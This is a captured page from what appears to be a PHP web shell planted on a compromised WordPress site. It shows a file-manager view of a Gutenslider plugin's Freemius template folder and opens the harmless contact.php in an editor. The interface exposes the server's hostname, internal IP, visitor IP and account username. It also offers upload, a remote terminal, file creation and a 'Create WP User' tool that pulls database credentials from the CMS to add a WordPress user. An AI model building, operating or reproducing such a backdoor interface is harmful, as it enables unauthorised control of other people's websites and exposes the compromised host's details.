Linux webm017.cluster130.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid x86_64
PHP/7.4.33
服务器IP :
10.130.20.17
& 您的IP :
216.73.216.193
域名 :
无法读取 [ /etc/named.conf ]
用户 :
koaigpw
上传
终端
新建文件
新建文件夹
Create WP User
登出
+
/
home
/
koaigpw
/
budomat_30102025
/
wp-content
/
plugins
/
gutenslider
/
freemius
/
templates
/
forms
/
deactivation
/
[ 返回根目录 ]
名称
大小
权限
修改时间
操作
..
-
-
-
contact.php
787.00 B
-rw-r--r--
2023-12-02 11:21
form.php
19.80 KB
-rw-r--r--
2023-12-02 11:21
index.php
87.00 B
-rw-r--r--
2023-12-02 11:21
retry-skip.php
1.14 KB
-rw-r--r--
2023-12-02 11:21
>_
终端
关闭 ✕
输入 'help' 查看可用命令。
koaigpw@
>
新建文件
文件名
取消
创建
重命名
新名称
取消
重命名
Create WordPress User
Auto (baca dari file CMS)
Manual (isi kredensial DB)
代码编辑器 :
contact.php
<?php /** * @package Freemius * @copyright Copyright (c) 2015, Freemius, Inc. * @license https://www.gnu.org/licenses/gpl-3.0.html GNU General Public License Version 3 * @since 1.2.0 */ if ( ! defined( 'ABSPATH' ) ) { exit; } /** * @var array $VARS */ $fs = freemius( $VARS['id'] ); $slug = $fs->get_slug(); echo fs_text_inline( 'Sorry for the inconvenience and we are here to help if you give us a chance.', 'contact-support-before-deactivation', $slug ) . sprintf(" <a href='%s' class='button button-small button-primary'>%s</a>", $fs->contact_url( 'technical_support' ), fs_text_inline( 'Contact Support', 'contact-support', $slug ) );
关闭
保存